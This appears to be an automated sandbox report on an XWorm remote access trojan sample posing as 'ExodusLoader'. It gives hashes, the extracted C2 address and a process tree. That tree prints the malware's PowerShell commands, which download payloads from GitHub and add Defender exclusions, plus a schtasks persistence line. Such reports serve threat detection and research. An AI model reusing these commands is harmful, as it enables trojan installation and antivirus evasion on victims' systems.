xworm | ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234

Analysis

max time kernel
128s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
07/03/2025, 04:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ExodusLoader.exe
Size

89KB
MD5

2f3405fa61bec944ed9d869adb6a37e3
SHA1

4a3c839b899809ba89a99eaadecf4da6d71e8256
SHA256

ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234
SHA512

72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0
SSDEEP

1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes

Install_directory
%ProgramData%
install_file
System.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2984-73-0x0000000001040000-0x000000000104E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
9	4092	powershell.exe
13	4092	powershell.exe
33	1940	powershell.exe
34	1940	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1940	powershell.exe
4092	powershell.exe
5088	powershell.exe
1720	powershell.exe

Downloads MZ/PE file 2 IoCs

flow	pid	Process
13	4092	powershell.exe
34	1940	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	AggregatorHost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	ExodusInject.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe

Executes dropped EXE 5 IoCs

pid	Process
1668	ExodusInject.exe
3980	Exodus.exe
2984	AggregatorHost.exe
3536	System.exe
2852	System.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
11	raw.githubusercontent.com
13	raw.githubusercontent.com
34	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1156	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3944	schtasks.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4092	powershell.exe
4092	powershell.exe
1940	powershell.exe
1940	powershell.exe
1720	powershell.exe
1720	powershell.exe
1720	powershell.exe
5088	powershell.exe
5088	powershell.exe
5088	powershell.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	1668	ExodusInject.exe
Token: SeBackupPrivilege	5068	vssvc.exe
Token: SeRestorePrivilege	5068	vssvc.exe
Token: SeAuditPrivilege	5068	vssvc.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	2984	AggregatorHost.exe
Token: SeDebugPrivilege	2984	AggregatorHost.exe
Token: SeDebugPrivilege	3536	System.exe
Token: SeDebugPrivilege	2852	System.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3864 wrote to memory of 4136	3864	ExodusLoader.exe	88
PID 3864 wrote to memory of 4136	3864	ExodusLoader.exe	88
PID 4136 wrote to memory of 4092	4136	cmd.exe	89
PID 4136 wrote to memory of 4092	4136	cmd.exe	89
PID 4136 wrote to memory of 1940	4136	cmd.exe	90
PID 4136 wrote to memory of 1940	4136	cmd.exe	90
PID 4136 wrote to memory of 1668	4136	cmd.exe	95
PID 4136 wrote to memory of 1668	4136	cmd.exe	95
PID 4136 wrote to memory of 3980	4136	cmd.exe	96
PID 4136 wrote to memory of 3980	4136	cmd.exe	96
PID 1668 wrote to memory of 1720	1668	ExodusInject.exe	100
PID 1668 wrote to memory of 1720	1668	ExodusInject.exe	100
PID 1668 wrote to memory of 5088	1668	ExodusInject.exe	102
PID 1668 wrote to memory of 5088	1668	ExodusInject.exe	102
PID 1668 wrote to memory of 4580	1668	ExodusInject.exe	109
PID 1668 wrote to memory of 4580	1668	ExodusInject.exe	109
PID 4580 wrote to memory of 1156	4580	cmd.exe	111
PID 4580 wrote to memory of 1156	4580	cmd.exe	111
PID 2984 wrote to memory of 3944	2984	AggregatorHost.exe	112
PID 2984 wrote to memory of 3944	2984	AggregatorHost.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe
"C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3864
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A103.tmp\A104.tmp\A105.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- - C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe
    "C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCCC6.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4580
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1156
- - C:\Users\Admin\AppData\Local\Temp\Exodus.exe
    "C:\Users\Admin\AppData\Local\Temp\Exodus.exe"
    3⤵
    - Executes dropped EXE
    PID:3980

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5068

C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3944

C:\ProgramData\System.exe
C:\ProgramData\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3536

C:\ProgramData\System.exe
C:\ProgramData\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

Filesize
1KB

MD5
c952c967a6c1013f7155cc3efed8cd03

SHA1
dc5bbab6c51387ee4d9863415a196e297457d045

SHA256
f825024aeb196af7aa49d77dccfae841aa55f9fef1c1f6f8f1e0c61032f8be12

SHA512
8126ef222f9ed0f332f56b8754ed24845fc03fadcbe61bf6d82e07da81b143e120ce82be14e59dc98b460e399563e8461bf0925089a71008af58b3acd6d6afef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3cf872ff42d077afa54eeb5239c35257

SHA1
aad49f55b12f383724ea6404f88e0348981e7e6a

SHA256
2be9197aa7bced6e1f5ce5a893ecfe1eb9419b57f3de9d73ed23b1bcf42772ad

SHA512
d3edaef63e3e3603a80c824294a5c1f96e472f499f7b8b0a739cfa83e45acdbb69d6bc7cc4658ca116c15e0b362e75f62c649b65da4d9788b78a0323f1f5f1c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4b0cc5354e48d5228ee628415e136a82

SHA1
74c6b3ca49b7d15121e12b61c8cb8a9a995deae6

SHA256
2d48e73152446d80250d947524121aade3f6210bb8d74150d74cea7b6fbc4daf

SHA512
fb7ad08ea8f69c1496e32195fc088854797620a79a4063036ed72bdb8dcb56d1471ee86f760821fb0eee813c1f2034ca4f81225844b209f30ecf78ccdb2b6e2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\A103.tmp\A104.tmp\A105.bat

Filesize
491B

MD5
54436d8e8995d677f8732385734718bc

SHA1
246137700bee34238352177b56fa1c0f674a6d0b

SHA256
20c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3

SHA512
57ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448

Download Submit
C:\Users\Admin\AppData\Local\Temp\Exodus.exe

Filesize
507KB

MD5
470ccdab5d7da8aafc11490e4c71e612

SHA1
bc540c0ba7dcb0405a7b6c775f0a1b585d51c4b3

SHA256
849c0420722c1dabb927ff0ab70375bc1197ba73a7f04885460b609392bd319c

SHA512
6b3a09b785c02a57f6330cd6610f8a78b1f6a1689c14a190a9af4ad4ab4666f8a77d75c4c85a3af04693effdc970440ce8d62a4132f66471aaa250f9d90f2f7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe

Filesize
227KB

MD5
38b7704d2b199559ada166401f1d51c1

SHA1
3376eec35cd4616ba8127b976a8667e7a0aac87d

SHA256
153825af8babb75361f4af359bfdd5e95cbdc7f263db5c4e70ac1da8f36bc564

SHA512
07b828073c8f80c5498501c8f64decb5effa702c8bc3d60a2f7d5de36d493b469cbbf413fb0c92c0aadd6ee139bfb75f3b9e936230212d42e57d2ec5671e9b27

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yf5aq4qz.x1q.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCCC6.tmp.bat

Filesize
164B

MD5
cbcd6e4438084453c78df61324ee48b1

SHA1
22bc0b5ca185165a162da8a21b30827925f8a4be

SHA256
9b4bab5f0a5f1f85f861a9ca37ce45780ffdfbd3653210743059da03d5710834

SHA512
c5bef5a13a52e16fcafe370805f7f8b8bee7226bfc8119abe4744eaea09f048b0abdfc6428114a3690ec583a0148027de307f00d01638d87993867035755b062

Download Submit
memory/1668-40-0x0000000000780000-0x00000000007C0000-memory.dmp

Filesize
256KB

Download
memory/1940-32-0x00007FFF40950000-0x00007FFF41411000-memory.dmp

Filesize
10.8MB

Download
memory/1940-33-0x00007FFF40950000-0x00007FFF41411000-memory.dmp

Filesize
10.8MB

Download
memory/1940-36-0x00007FFF40950000-0x00007FFF41411000-memory.dmp

Filesize
10.8MB

Download
memory/1940-21-0x00007FFF40950000-0x00007FFF41411000-memory.dmp

Filesize
10.8MB

Download
memory/2984-73-0x0000000001040000-0x000000000104E000-memory.dmp

Filesize
56KB

Download
memory/4092-19-0x00007FFF40950000-0x00007FFF41411000-memory.dmp

Filesize
10.8MB

Download
memory/4092-18-0x0000015FA0190000-0x0000015FA03AC000-memory.dmp

Filesize
2.1MB

Download
memory/4092-14-0x00007FFF40950000-0x00007FFF41411000-memory.dmp

Filesize
10.8MB

Download
memory/4092-13-0x00007FFF40950000-0x00007FFF41411000-memory.dmp

Filesize
10.8MB

Download
memory/4092-12-0x0000015FA04B0000-0x0000015FA04D2000-memory.dmp

Filesize
136KB

Download
memory/4092-2-0x00007FFF40953000-0x00007FFF40955000-memory.dmp

Filesize
8KB

Download